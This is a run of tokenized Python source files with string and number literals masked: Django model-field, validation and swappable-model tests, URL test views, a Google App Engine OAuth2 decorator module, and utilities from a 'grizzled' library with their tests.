<NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT> ) ) <EOL> class BooleanFieldTests ( unittest . TestCase ) : <EOL> def _test_get_db_prep_lookup ( self , f ) : <EOL> from django . db import connection <EOL> self . assertEqual ( f . get_db_prep_lookup ( '<STR_LIT>' , True , connection = connection ) , [ True ] ) <EOL> self . assertEqual ( f . get_db_prep_lookup ( '<STR_LIT>' , '<STR_LIT:1>' , connection = connection ) , [ True ] ) <EOL> self . assertEqual ( f . get_db_prep_lookup ( '<STR_LIT>' , <NUM_LIT:1> , connection = connection ) , [ True ] ) <EOL> self . assertEqual ( f . get_db_prep_lookup ( '<STR_LIT>' , False , connection = connection ) , [ False ] ) <EOL> self . assertEqual ( f . get_db_prep_lookup ( '<STR_LIT>' , '<STR_LIT:0>' , connection = connection ) , [ False ] ) <EOL> self . assertEqual ( f . get_db_prep_lookup ( '<STR_LIT>' , <NUM_LIT:0> , connection = connection ) , [ False ] ) <EOL> self . assertEqual ( f . get_db_prep_lookup ( '<STR_LIT>' , None , connection = connection ) , [ None ] ) <EOL> def _test_to_python ( self , f ) : <EOL> self . assertTrue ( f . to_python ( <NUM_LIT:1> ) is True ) <EOL> self . assertTrue ( f . to_python ( <NUM_LIT:0> ) is False ) <EOL> def test_booleanfield_get_db_prep_lookup ( self ) : <EOL> self . _test_get_db_prep_lookup ( models . BooleanField ( ) ) <EOL> def test_nullbooleanfield_get_db_prep_lookup ( self ) : <EOL> self . _test_get_db_prep_lookup ( models . NullBooleanField ( ) ) <EOL> def test_booleanfield_to_python ( self ) : <EOL> self . _test_to_python ( models . BooleanField ( ) ) <EOL> def test_nullbooleanfield_to_python ( self ) : <EOL> self . _test_to_python ( models . NullBooleanField ( ) ) <EOL> def test_booleanfield_choices_blank ( self ) : <EOL> """<STR_LIT>""" <EOL> choices = [ ( <NUM_LIT:1> , '<STR_LIT>' ) , ( <NUM_LIT:2> , '<STR_LIT>' ) ] <EOL> f = models . BooleanField ( choices = choices , default = <NUM_LIT:1> , null = True ) <EOL> self . assertEqual ( f . formfield ( ) . choices , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] + choices ) <EOL> f = models . BooleanField ( choices = choices , default = <NUM_LIT:1> , null = False ) <EOL> self . assertEqual ( f . formfield ( ) . choices , choices ) <EOL> def test_return_type ( self ) : <EOL> b = BooleanModel ( ) <EOL> b . bfield = True <EOL> b . save ( ) <EOL> b2 = BooleanModel . objects . get ( pk = b . pk ) <EOL> self . assertTrue ( isinstance ( b2 . bfield , bool ) ) <EOL> self . assertEqual ( b2 . bfield , True ) <EOL> b3 = BooleanModel ( ) <EOL> b3 . bfield = False <EOL> b3 . save ( ) <EOL> b4 = BooleanModel . objects . get ( pk = b3 . pk ) <EOL> self . assertTrue ( isinstance ( b4 . bfield , bool ) ) <EOL> self . assertEqual ( b4 . bfield , False ) <EOL> b = NullBooleanModel ( ) <EOL> b . nbfield = True <EOL> b . save ( ) <EOL> b2 = NullBooleanModel . objects . get ( pk = b . pk ) <EOL> self . assertTrue ( isinstance ( b2 . nbfield , bool ) ) <EOL> self . assertEqual ( b2 . nbfield , True ) <EOL> b3 = NullBooleanModel ( ) <EOL> b3 . nbfield = False <EOL> b3 . save ( ) <EOL> b4 = NullBooleanModel . objects . get ( pk = b3 . pk ) <EOL> self . assertTrue ( isinstance ( b4 . nbfield , bool ) ) <EOL> self . assertEqual ( b4 . nbfield , False ) <EOL> b5 = BooleanModel . objects . all ( ) . extra ( <EOL> select = { '<STR_LIT>' : '<STR_LIT:string>' } ) [ <NUM_LIT:0> ] <EOL> self . assertFalse ( isinstance ( b5 . pk , bool ) ) <EOL> def test_select_related ( self ) : <EOL> """<STR_LIT>""" <EOL> bmt = BooleanModel . objects . create ( bfield = True ) <EOL> bmf = BooleanModel . objects . create ( bfield = False ) <EOL> nbmt = NullBooleanModel . objects . create ( nbfield = True ) <EOL> nbmf = NullBooleanModel . objects . create ( nbfield = False ) <EOL> m1 = FksToBooleans . objects . create ( bf = bmt , nbf = nbmt ) <EOL> m2 = FksToBooleans . objects . create ( bf = bmf , nbf = nbmf ) <EOL> ma = FksToBooleans . objects . select_related ( '<STR_LIT>' ) . get ( pk = m1 . id ) <EOL> self . assertIsInstance ( ma . bf . bfield , bool ) <EOL> self . assertIsInstance ( ma . nbf . nbfield , bool ) <EOL> self . assertEqual ( ma . bf . bfield , True ) <EOL> self . assertEqual ( ma . nbf . nbfield , True ) <EOL> mb = FksToBooleans . objects . select_related ( ) . get ( pk = m1 . id ) <EOL> mc = FksToBooleans . objects . select_related ( ) . get ( pk = m2 . id ) <EOL> self . assertIsInstance ( mb . bf . bfield , bool ) <EOL> self . assertIsInstance ( mb . nbf . nbfield , bool ) <EOL> self . assertIsInstance ( mc . bf . bfield , bool ) <EOL> self . assertIsInstance ( mc . nbf . nbfield , bool ) <EOL> self . assertEqual ( mb . bf . bfield , True ) <EOL> self . assertEqual ( mb . nbf . nbfield , True ) <EOL> self . assertEqual ( mc . bf . bfield , False ) <EOL> self . assertEqual ( mc . nbf . nbfield , False ) <EOL> class ChoicesTests ( test . TestCase ) : <EOL> def test_choices_and_field_display ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( Whiz ( c = <NUM_LIT:1> ) . get_c_display ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( Whiz ( c = <NUM_LIT:0> ) . get_c_display ( ) , '<STR_LIT>' ) <EOL> self . assertEqual ( Whiz ( c = <NUM_LIT:9> ) . get_c_display ( ) , <NUM_LIT:9> ) <EOL> self . assertEqual ( Whiz ( c = None ) . get_c_display ( ) , None ) <EOL> self . assertEqual ( Whiz ( c = '<STR_LIT>' ) . get_c_display ( ) , '<STR_LIT>' ) <EOL> class SlugFieldTests ( test . TestCase ) : <EOL> def test_slugfield_max_length ( self ) : <EOL> """<STR_LIT>""" <EOL> bs = BigS . objects . create ( s = '<STR_LIT>' * <NUM_LIT:50> ) <EOL> bs = BigS . objects . get ( pk = bs . pk ) <EOL> self . assertEqual ( bs . s , '<STR_LIT>' * <NUM_LIT:50> ) <EOL> class ValidationTest ( test . TestCase ) : <EOL> def test_charfield_raises_error_on_empty_string ( self ) : <EOL> f = models . CharField ( ) <EOL> self . assertRaises ( ValidationError , f . clean , "<STR_LIT>" , None ) <EOL> def test_charfield_cleans_empty_string_when_blank_true ( self ) : <EOL> f = models . CharField ( blank = True ) <EOL> self . assertEqual ( '<STR_LIT>' , f . clean ( '<STR_LIT>' , None ) ) <EOL> def test_integerfield_cleans_valid_string ( self ) : <EOL> f = models . IntegerField ( ) <EOL> self . assertEqual ( <NUM_LIT:2> , f . clean ( '<STR_LIT:2>' , None ) ) <EOL> def test_integerfield_raises_error_on_invalid_intput ( self ) : <EOL> f = models . IntegerField ( ) <EOL> self . assertRaises ( ValidationError , f . clean , "<STR_LIT:a>" , None ) <EOL> def test_charfield_with_choices_cleans_valid_choice ( self ) : <EOL> f = models . CharField ( max_length = <NUM_LIT:1> , choices = [ ( '<STR_LIT:a>' , '<STR_LIT:A>' ) , ( '<STR_LIT:b>' , '<STR_LIT:B>' ) ] ) <EOL> self . assertEqual ( '<STR_LIT:a>' , f . clean ( '<STR_LIT:a>' , None ) ) <EOL> def test_charfield_with_choices_raises_error_on_invalid_choice ( self ) : <EOL> f = models . CharField ( choices = [ ( '<STR_LIT:a>' , '<STR_LIT:A>' ) , ( '<STR_LIT:b>' , '<STR_LIT:B>' ) ] ) <EOL> self . assertRaises ( ValidationError , f . clean , "<STR_LIT>" , None ) <EOL> def test_choices_validation_supports_named_groups ( self ) : <EOL> f = models . IntegerField ( choices = ( ( '<STR_LIT>' , ( ( <NUM_LIT:10> , '<STR_LIT:A>' ) , ( <NUM_LIT:20> , '<STR_LIT:B>' ) ) ) , ( <NUM_LIT:30> , '<STR_LIT:C>' ) ) ) <EOL> self . assertEqual ( <NUM_LIT:10> , f . clean ( <NUM_LIT:10> , None ) ) <EOL> def test_nullable_integerfield_raises_error_with_blank_false ( self ) : <EOL> f = models . IntegerField ( null = True , blank = False ) <EOL> self . assertRaises ( ValidationError , f . clean , None , None ) <EOL> def test_nullable_integerfield_cleans_none_on_null_and_blank_true ( self ) : <EOL> f = models . IntegerField ( null = True , blank = True ) <EOL> self . assertEqual ( None , f . clean ( None , None ) ) <EOL> def test_integerfield_raises_error_on_empty_input ( self ) : <EOL> f = models . IntegerField ( null = False ) <EOL> self . assertRaises ( ValidationError , f . clean , None , None ) <EOL> self . assertRaises ( ValidationError , f . clean , '<STR_LIT>' , None ) <EOL> def test_integerfield_validates_zero_against_choices ( self ) : <EOL> f = models . IntegerField ( choices = ( ( <NUM_LIT:1> , <NUM_LIT:1> ) , ) ) <EOL> self . assertRaises ( ValidationError , f . clean , '<STR_LIT:0>' , None ) <EOL> def test_charfield_raises_error_on_empty_input ( self ) : <EOL> f = models . CharField ( null = False ) <EOL> self . assertRaises ( ValidationError , f . clean , None , None ) <EOL> def test_datefield_cleans_date ( self ) : <EOL> f = models . DateField ( ) <EOL> self . assertEqual ( datetime . date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:10> ) , f . clean ( '<STR_LIT>' , None ) ) <EOL> def test_boolean_field_doesnt_accept_empty_input ( self ) : <EOL> f = models . BooleanField ( ) <EOL> self . assertRaises ( ValidationError , f . clean , None , None ) <EOL> class BigIntegerFieldTests ( test . TestCase ) : <EOL> def test_limits ( self ) : <EOL> maxval = <NUM_LIT> <EOL> minval = - maxval - <NUM_LIT:1> <EOL> BigInt . objects . create ( value = maxval ) <EOL> qs = BigInt . objects . filter ( value__gte = maxval ) <EOL> self . assertEqual ( qs . count ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( qs [ <NUM_LIT:0> ] . value , maxval ) <EOL> BigInt . objects . create ( value = minval ) <EOL> qs = BigInt . objects . filter ( value__lte = minval ) <EOL> self . assertEqual ( qs . count ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( qs [ <NUM_LIT:0> ] . value , minval ) <EOL> def test_types ( self ) : <EOL> b = BigInt ( value = <NUM_LIT:0> ) <EOL> self . assertTrue ( isinstance ( b . value , six . integer_types ) ) <EOL> b . save ( ) <EOL> self . assertTrue ( isinstance ( b . value , six . integer_types ) ) <EOL> b = BigInt . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( isinstance ( b . value , six . integer_types ) ) <EOL> def test_coercing ( self ) : <EOL> BigInt . objects . create ( value = '<STR_LIT>' ) <EOL> b = BigInt . objects . get ( value = '<STR_LIT>' ) <EOL> self . assertEqual ( b . value , <NUM_LIT:10> ) <EOL> class TypeCoercionTests ( test . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_lookup_integer_in_charfield ( self ) : <EOL> self . assertEqual ( Post . objects . filter ( title = <NUM_LIT:9> ) . count ( ) , <NUM_LIT:0> ) <EOL> def test_lookup_integer_in_textfield ( self ) : <EOL> self . assertEqual ( Post . objects . filter ( body = <NUM_LIT> ) . count ( ) , <NUM_LIT:0> ) <EOL> class FileFieldTests ( unittest . TestCase ) : <EOL> def test_clearable ( self ) : <EOL> """<STR_LIT>""" <EOL> d = Document ( myfile = '<STR_LIT>' ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) <EOL> field = d . _meta . get_field ( '<STR_LIT>' ) <EOL> field . save_form_data ( d , False ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) <EOL> def test_unchanged ( self ) : <EOL> """<STR_LIT>""" <EOL> d = Document ( myfile = '<STR_LIT>' ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) <EOL> field = d . _meta . get_field ( '<STR_LIT>' ) <EOL> field . save_form_data ( d , None ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) <EOL> def test_changed ( self ) : <EOL> """<STR_LIT>""" <EOL> d = Document ( myfile = '<STR_LIT>' ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) <EOL> field = d . _meta . get_field ( '<STR_LIT>' ) <EOL> field . save_form_data ( d , '<STR_LIT>' ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . utils . six import StringIO <EOL> from django . contrib . auth . models import Permission <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . core import management <EOL> from django . db . models . loading import cache <EOL> from django . test import TestCase <EOL> from django . test . utils import override_settings <EOL> from regressiontests . swappable_models . models import Article <EOL> class SwappableModelTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> cache . _get_models_cache . clear ( ) <EOL> def tearDown ( self ) : <EOL> cache . _get_models_cache . clear ( ) <EOL> @ override_settings ( TEST_ARTICLE_MODEL = '<STR_LIT>' ) <EOL> def test_generated_data ( self ) : <EOL> "<STR_LIT>" <EOL> Permission . objects . filter ( content_type__app_label = '<STR_LIT>' ) . delete ( ) <EOL> ContentType . objects . filter ( app_label = '<STR_LIT>' ) . delete ( ) <EOL> new_io = StringIO ( ) <EOL> management . call_command ( '<STR_LIT>' , load_initial_data = False , interactive = False , stdout = new_io ) <EOL> apps_models = [ ( p . content_type . app_label , p . content_type . model ) <EOL> for p in Permission . objects . all ( ) ] <EOL> self . assertIn ( ( '<STR_LIT>' , '<STR_LIT>' ) , apps_models ) <EOL> self . assertNotIn ( ( '<STR_LIT>' , '<STR_LIT>' ) , apps_models ) <EOL> apps_models = [ ( ct . app_label , ct . model ) <EOL> for ct in ContentType . objects . all ( ) ] <EOL> self . assertIn ( ( '<STR_LIT>' , '<STR_LIT>' ) , apps_models ) <EOL> self . assertNotIn ( ( '<STR_LIT>' , '<STR_LIT>' ) , apps_models ) <EOL> @ override_settings ( TEST_ARTICLE_MODEL = '<STR_LIT>' ) <EOL> def test_case_insensitive ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> Article . objects . all ( ) <EOL> except AttributeError : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertIsNone ( Article . _meta . swapped ) </s>
<s> from django . http import HttpResponse <EOL> from django . views . generic import RedirectView <EOL> from django . core . urlresolvers import reverse_lazy <EOL> from django . contrib . auth . decorators import user_passes_test <EOL> def empty_view ( request , * args , ** kwargs ) : <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> def kwargs_view ( request , arg1 = <NUM_LIT:1> , arg2 = <NUM_LIT:2> ) : <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> def absolute_kwargs_view ( request , arg1 = <NUM_LIT:1> , arg2 = <NUM_LIT:2> ) : <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> def defaults_view ( request , arg1 , arg2 ) : <EOL> pass <EOL> def erroneous_view ( request ) : <EOL> import non_existent <EOL> def pass_resolver_match_view ( request , * args , ** kwargs ) : <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . resolver_match = request . resolver_match <EOL> return response <EOL> uncallable = "<STR_LIT>" <EOL> class ViewClass ( object ) : <EOL> def __call__ ( self , request , * args , ** kwargs ) : <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> view_class_instance = ViewClass ( ) <EOL> class LazyRedirectView ( RedirectView ) : <EOL> url = reverse_lazy ( '<STR_LIT>' ) <EOL> @ user_passes_test ( lambda u : u . is_authenticated ( ) , login_url = reverse_lazy ( '<STR_LIT>' ) ) <EOL> def login_required_view ( request ) : <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> def bad_view ( request , * args , ** kwargs ) : <EOL> raise ValueError ( "<STR_LIT>" ) </s>
<s> from __future__ import absolute_import <EOL> from . debug import ( DebugViewTests , ExceptionReporterTests , <EOL> ExceptionReporterTests , PlainTextReportTests , ExceptionReporterFilterTests , <EOL> AjaxResponseExceptionReporterFilter ) <EOL> from . defaults import DefaultsTests <EOL> from . i18n import JsI18NTests , I18NTests , JsI18NTestsMultiPackage , JavascriptI18nTests <EOL> from . shortcuts import ShortcutTests <EOL> from . specials import URLHandling <EOL> from . static import StaticHelperTest , StaticUtilsTests , StaticTests </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import base64 <EOL> import httplib2 <EOL> import logging <EOL> import pickle <EOL> import time <EOL> import clientsecrets <EOL> from anyjson import simplejson <EOL> from client import AccessTokenRefreshError <EOL> from client import AssertionCredentials <EOL> from client import Credentials <EOL> from client import Flow <EOL> from client import OAuth2WebServerFlow <EOL> from client import Storage <EOL> from google . appengine . api import memcache <EOL> from google . appengine . api import users <EOL> from google . appengine . api . app_identity import app_identity <EOL> from google . appengine . ext import db <EOL> from google . appengine . ext import webapp <EOL> from google . appengine . ext . webapp . util import login_required <EOL> from google . appengine . ext . webapp . util import run_wsgi_app <EOL> OAUTH2CLIENT_NAMESPACE = '<STR_LIT>' <EOL> class InvalidClientSecretsError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AppAssertionCredentials ( AssertionCredentials ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , scope , <EOL> audience = '<STR_LIT>' , <EOL> assertion_type = '<STR_LIT>' , <EOL> token_uri = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . scope = scope <EOL> self . audience = audience <EOL> self . app_name = app_identity . get_service_account_name ( ) <EOL> super ( AppAssertionCredentials , self ) . __init__ ( <EOL> assertion_type , <EOL> None , <EOL> token_uri ) <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> data = simplejson . loads ( json ) <EOL> retval = AccessTokenCredentials ( <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] ) <EOL> return retval <EOL> def _generate_assertion ( self ) : <EOL> header = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> now = int ( time . time ( ) ) <EOL> claims = { <EOL> '<STR_LIT>' : self . audience , <EOL> '<STR_LIT>' : self . scope , <EOL> '<STR_LIT>' : now , <EOL> '<STR_LIT>' : now + <NUM_LIT> , <EOL> '<STR_LIT>' : self . app_name , <EOL> } <EOL> jwt_components = [ base64 . b64encode ( simplejson . dumps ( seg ) ) <EOL> for seg in [ header , claims ] ] <EOL> base_str = "<STR_LIT:.>" . join ( jwt_components ) <EOL> key_name , signature = app_identity . sign_blob ( base_str ) <EOL> jwt_components . append ( base64 . b64encode ( signature ) ) <EOL> return "<STR_LIT:.>" . join ( jwt_components ) <EOL> class FlowProperty ( db . Property ) : <EOL> """<STR_LIT>""" <EOL> data_type = Flow <EOL> def get_value_for_datastore ( self , model_instance ) : <EOL> flow = super ( FlowProperty , <EOL> self ) . get_value_for_datastore ( model_instance ) <EOL> return db . Blob ( pickle . dumps ( flow ) ) <EOL> def make_value_from_datastore ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> return pickle . loads ( value ) <EOL> def validate ( self , value ) : <EOL> if value is not None and not isinstance ( value , Flow ) : <EOL> raise db . BadValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( self . name , value ) ) <EOL> return super ( FlowProperty , self ) . validate ( value ) <EOL> def empty ( self , value ) : <EOL> return not value <EOL> class CredentialsProperty ( db . Property ) : <EOL> """<STR_LIT>""" <EOL> data_type = Credentials <EOL> def get_value_for_datastore ( self , model_instance ) : <EOL> logging . info ( "<STR_LIT>" + str ( type ( model_instance ) ) ) <EOL> cred = super ( CredentialsProperty , <EOL> self ) . get_value_for_datastore ( model_instance ) <EOL> if cred is None : <EOL> cred = '<STR_LIT>' <EOL> else : <EOL> cred = cred . to_json ( ) <EOL> return db . Blob ( cred ) <EOL> def make_value_from_datastore ( self , value ) : <EOL> logging . info ( "<STR_LIT>" + str ( type ( value ) ) ) <EOL> if value is None : <EOL> return None <EOL> if len ( value ) == <NUM_LIT:0> : <EOL> return None <EOL> try : <EOL> credentials = Credentials . new_from_json ( value ) <EOL> except ValueError : <EOL> credentials = None <EOL> return credentials <EOL> def validate ( self , value ) : <EOL> value = super ( CredentialsProperty , self ) . validate ( value ) <EOL> logging . info ( "<STR_LIT>" + str ( type ( value ) ) ) <EOL> if value is not None and not isinstance ( value , Credentials ) : <EOL> raise db . BadValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( self . name , value ) ) <EOL> return value <EOL> class StorageByKeyName ( Storage ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , key_name , property_name , cache = None ) : <EOL> """<STR_LIT>""" <EOL> self . _model = model <EOL> self . _key_name = key_name <EOL> self . _property_name = property_name <EOL> self . _cache = cache <EOL> def locked_get ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _cache : <EOL> json = self . _cache . get ( self . _key_name ) <EOL> if json : <EOL> return Credentials . new_from_json ( json ) <EOL> credential = None <EOL> entity = self . _model . get_by_key_name ( self . _key_name ) <EOL> if entity is not None : <EOL> credential = getattr ( entity , self . _property_name ) <EOL> if credential and hasattr ( credential , '<STR_LIT>' ) : <EOL> credential . set_store ( self ) <EOL> if self . _cache : <EOL> self . _cache . set ( self . _key_name , credentials . to_json ( ) ) <EOL> return credential <EOL> def locked_put ( self , credentials ) : <EOL> """<STR_LIT>""" <EOL> entity = self . _model . get_or_insert ( self . _key_name ) <EOL> setattr ( entity , self . _property_name , credentials ) <EOL> entity . put ( ) <EOL> if self . _cache : <EOL> self . _cache . set ( self . _key_name , credentials . to_json ( ) ) <EOL> class CredentialsModel ( db . Model ) : <EOL> """<STR_LIT>""" <EOL> credentials = CredentialsProperty ( ) <EOL> class OAuth2Decorator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client_id , client_secret , scope , <EOL> auth_uri = '<STR_LIT>' , <EOL> token_uri = '<STR_LIT>' , <EOL> message = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . flow = OAuth2WebServerFlow ( client_id , client_secret , scope , None , <EOL> auth_uri , token_uri , ** kwargs ) <EOL> self . credentials = None <EOL> self . _request_handler = None <EOL> self . _message = message <EOL> self . _in_error = False <EOL> def _display_error_message ( self , request_handler ) : <EOL> request_handler . response . out . write ( '<STR_LIT>' ) <EOL> request_handler . response . out . write ( self . _message ) <EOL> request_handler . response . out . write ( '<STR_LIT>' ) <EOL> def oauth_required ( self , method ) : <EOL> """<STR_LIT>""" <EOL> def check_oauth ( request_handler , * args ) : <EOL> if self . _in_error : <EOL> self . _display_error_message ( request_handler ) <EOL> return <EOL> user = users . get_current_user ( ) <EOL> if not user : <EOL> request_handler . redirect ( users . create_login_url ( <EOL> request_handler . request . uri ) ) <EOL> return <EOL> self . flow . params [ '<STR_LIT:state>' ] = request_handler . request . url <EOL> self . _request_handler = request_handler <EOL> self . credentials = StorageByKeyName ( <EOL> CredentialsModel , user . user_id ( ) , '<STR_LIT>' ) . get ( ) <EOL> if not self . has_credentials ( ) : <EOL> return request_handler . redirect ( self . authorize_url ( ) ) <EOL> try : <EOL> method ( request_handler , * args ) <EOL> except AccessTokenRefreshError : <EOL> return request_handler . redirect ( self . authorize_url ( ) ) <EOL> return check_oauth <EOL> def oauth_aware ( self , method ) : <EOL> """<STR_LIT>""" <EOL> def setup_oauth ( request_handler , * args ) : <EOL> if self . _in_error : <EOL> self . _display_error_message ( request_handler ) <EOL> return <EOL> user = users . get_current_user ( ) <EOL> if not user : <EOL> request_handler . redirect ( users . create_login_url ( <EOL> request_handler . request . uri ) ) <EOL> return <EOL> self . flow . params [ '<STR_LIT:state>' ] = request_handler . request . url <EOL> self . _request_handler = request_handler <EOL> self . credentials = StorageByKeyName ( <EOL> CredentialsModel , user . user_id ( ) , '<STR_LIT>' ) . get ( ) <EOL> method ( request_handler , * args ) <EOL> return setup_oauth <EOL> def has_credentials ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . credentials is not None and not self . credentials . invalid <EOL> def authorize_url ( self ) : <EOL> """<STR_LIT>""" <EOL> callback = self . _request_handler . request . relative_url ( '<STR_LIT>' ) <EOL> url = self . flow . step1_get_authorize_url ( callback ) <EOL> user = users . get_current_user ( ) <EOL> memcache . set ( user . user_id ( ) , pickle . dumps ( self . flow ) , <EOL> namespace = OAUTH2CLIENT_NAMESPACE ) <EOL> return url <EOL> def http ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . credentials . authorize ( httplib2 . Http ( ) ) <EOL> class OAuth2DecoratorFromClientSecrets ( OAuth2Decorator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filename , scope , message = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> client_type , client_info = clientsecrets . loadfile ( filename ) <EOL> if client_type not in [ clientsecrets . TYPE_WEB , clientsecrets . TYPE_INSTALLED ] : <EOL> raise InvalidClientSecretsError ( '<STR_LIT>' ) <EOL> super ( OAuth2DecoratorFromClientSecrets , <EOL> self ) . __init__ ( <EOL> client_info [ '<STR_LIT>' ] , <EOL> client_info [ '<STR_LIT>' ] , <EOL> scope , <EOL> client_info [ '<STR_LIT>' ] , <EOL> client_info [ '<STR_LIT>' ] , <EOL> message ) <EOL> except clientsecrets . InvalidClientSecretsError : <EOL> self . _in_error = True <EOL> if message is not None : <EOL> self . _message = message <EOL> else : <EOL> self . _message = "<STR_LIT>" <EOL> def oauth2decorator_from_clientsecrets ( filename , scope , message = None ) : <EOL> """<STR_LIT>""" <EOL> return OAuth2DecoratorFromClientSecrets ( filename , scope , message ) <EOL> class OAuth2Handler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> @ login_required <EOL> def get ( self ) : <EOL> error = self . request . get ( '<STR_LIT:error>' ) <EOL> if error : <EOL> errormsg = self . request . get ( '<STR_LIT>' , error ) <EOL> self . response . out . write ( <EOL> '<STR_LIT>' % errormsg ) <EOL> else : <EOL> user = users . get_current_user ( ) <EOL> flow = pickle . loads ( memcache . get ( user . user_id ( ) , <EOL> namespace = OAUTH2CLIENT_NAMESPACE ) ) <EOL> if flow : <EOL> credentials = flow . step2_exchange ( self . request . params ) <EOL> StorageByKeyName ( <EOL> CredentialsModel , user . user_id ( ) , '<STR_LIT>' ) . put ( credentials ) <EOL> self . redirect ( str ( self . request . get ( '<STR_LIT:state>' ) ) ) <EOL> else : <EOL> pass <EOL> application = webapp . WSGIApplication ( [ ( '<STR_LIT>' , OAuth2Handler ) ] ) <EOL> def main ( ) : <EOL> run_wsgi_app ( application ) </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = "<STR_LIT>" <EOL> from grizzled . db . base import DBDriver <EOL> BINARY = <NUM_LIT:0> <EOL> NUMBER = <NUM_LIT:1> <EOL> STRING = <NUM_LIT:2> <EOL> DATETIME = <NUM_LIT:3> <EOL> ROWID = <NUM_LIT:4> <EOL> class DummyCursor ( object ) : <EOL> def close ( self ) : <EOL> pass <EOL> def execute ( self , statement , parameters = None ) : <EOL> self . rowcount = <NUM_LIT:0> <EOL> self . description = "<STR_LIT>" <EOL> return None <EOL> def fetchone ( self ) : <EOL> raise ValueError , "<STR_LIT>" <EOL> def fetchall ( self ) : <EOL> raise ValueError , "<STR_LIT>" <EOL> def fetchmany ( self , n ) : <EOL> raise ValueError , "<STR_LIT>" <EOL> class DummyDB ( object ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> def cursor ( self ) : <EOL> return DummyCursor ( ) <EOL> def commit ( self ) : <EOL> pass <EOL> def rollback ( self ) : <EOL> pass <EOL> def close ( self ) : <EOL> pass <EOL> class DummyDriver ( DBDriver ) : <EOL> """<STR_LIT>""" <EOL> def get_import ( self ) : <EOL> import dummydb <EOL> return dummydb <EOL> def get_display_name ( self ) : <EOL> return "<STR_LIT>" <EOL> def do_connect ( self , <EOL> host = "<STR_LIT:localhost>" , <EOL> port = None , <EOL> user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> database = '<STR_LIT:default>' ) : <EOL> return dummydb . DummyDB ( ) </s>
<s> from __future__ import absolute_import <EOL> import sys <EOL> from grizzled . system import * <EOL> VERSIONS = [ ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) ] <EOL> class TestSys ( object ) : <EOL> def test_version_conversions ( self ) : <EOL> for s , i in VERSIONS : <EOL> yield self . do_one_version_conversion , s , i <EOL> def do_one_version_conversion ( self , string_version , binary_version ) : <EOL> h = python_version ( string_version ) <EOL> s = python_version_string ( binary_version ) <EOL> assert h == binary_version <EOL> assert s == string_version <EOL> def test_current_version ( self ) : <EOL> ensure_version ( sys . hexversion ) <EOL> ensure_version ( python_version_string ( sys . hexversion ) ) <EOL> major , minor , patch , final , rem = sys . version_info <EOL> binary_version = python_version ( '<STR_LIT>' % ( major , minor , patch ) ) <EOL> def test_class_for_name ( self ) : <EOL> cls = class_for_name ( '<STR_LIT>' ) <EOL> got_name = '<STR_LIT>' % ( cls . __module__ , cls . __name__ ) <EOL> assert got_name == '<STR_LIT>' <EOL> try : <EOL> class_for_name ( '<STR_LIT>' ) <EOL> assert False <EOL> except NameError : <EOL> pass <EOL> except ImportError : <EOL> pass </s>
